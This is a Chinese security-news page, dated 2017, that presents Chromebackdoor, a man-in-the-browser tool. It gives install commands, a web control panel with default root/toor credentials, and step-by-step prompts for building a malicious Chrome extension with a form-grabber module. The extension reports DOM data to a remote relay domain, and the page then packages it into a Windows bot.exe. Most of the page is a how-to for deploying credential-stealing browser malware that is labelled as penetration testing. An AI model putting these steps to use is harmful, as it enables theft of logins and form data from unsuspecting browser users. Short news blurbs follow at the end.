工具
首页 > 工具> 正文

Chromebackdoor - 浏览器后门工具

Chromebackdoor 是一款渗透测试工具,该工具使用 MITB 技术生成Windows可执行文件 “.exe”,启动程序会运行恶意的插件扩展,或运行支持主流浏览器的脚本.....

作者:paper来源:paper|2017-01-10 15:12:42

项目地址:https://github.com/graniet/chromebackdoor

Chromebackdoor 是一款渗透测试工具,该工具使用 MITB 技术生成Windows可执行文件 “.exe”,启动程序会运行恶意的插件扩展,或运行支持主流浏览器的脚本,并发送所有 DOM 数据以执行命令进行控制。、

安装方法

环境要求:

pip%20install%20crxmake%20  wine32%20 

python%20chromebackdoor.py%20 

安装web

1) 首先解压生成的 chromebackdook

unzip folder.zip  

2) 上传 web 文件夹至服务器

3) 创建数据库和用户,更新配置文件 

对应路径

/web/includes/config.php

4) 数据库导入 .SQL 文件

/SQL/chromebackdoor.sql

5) 登录 Web 面板 (web/index.php)

username = root  
password = toor  

生成被控端(不通过 .exe)

安装依赖 & python chromebackdoor.py

python chromebackdoor.py  

可以给各大主流浏览器生成后门。

比如 Google Chrome:

python chromebackdoor.py --chrome  

这时需要输入域名 (需要 SSL):

[?] Website hosted (https://localhost/)? https://lynxframework.com/
relais (需要SSL):

[?] Website relais url (https://localhost/relais)? https://lynxrelay.com/relais
or use same domain  
[?] Website relais url (https://localhost/relais)? https://lynxframework.com/relais
[?] Information correct [Y/n]? Y

选择模块 (比如 FormGrabber V1.0)

[?] please select numbers ? 2

该脚本生成了 .crx .perm 和后门文件夹

构建 .exe

1) 使用 --build 参数

python chromebackdoor.py --build 

2) 选择后门 (比如 --chrome)

[?] crx fime (/root/..) ? /root/backdoor.crx

3) wine 启动 installer.exe 生成 bot.exe

Generate successful : {chromebackdoor_folder}/bot.exe  

4) 用 Windows 启动 bot.exe

Web 控制端界面:

 

【责任编辑:paper 】

分享:

安全快讯+更多

湖南青年杨某沉迷“黑客”技术,利用国外网络攻击网站的攻击服务,花钱请人开发成软件后,通过QQ群推销,并发展代理商销售,8个月内获利数万元。
6月13日,由赛可达实验室、国家计算机病毒应急处理中心、国家网络与信息系统安全产品质量监督检验中心、首都创新大联盟共同举办的第五届中国网络安全大会(NSC2017)在北京国家会议中心隆重举行。
《中华人民共和国网络安全法》已于6月1日正式实施并成为我国网络空间法治建设的重要里程碑,在确立安全在整个信息系统建设中的核心和关键地位的同时,也对保护公众个人信息安全起到了积极作用。
Shadow Brokers(影子经纪人)回应想哭勒索蠕虫事件,同时公布了一个月度销售计划,称自6月开始,每个月都有高危0day、黑客工具、机密数据售卖。
勒索病毒“WannaCry”(永恒之蓝)在全球范围内的爆发,恐怕是这几天影响力最大的公共安全事件了。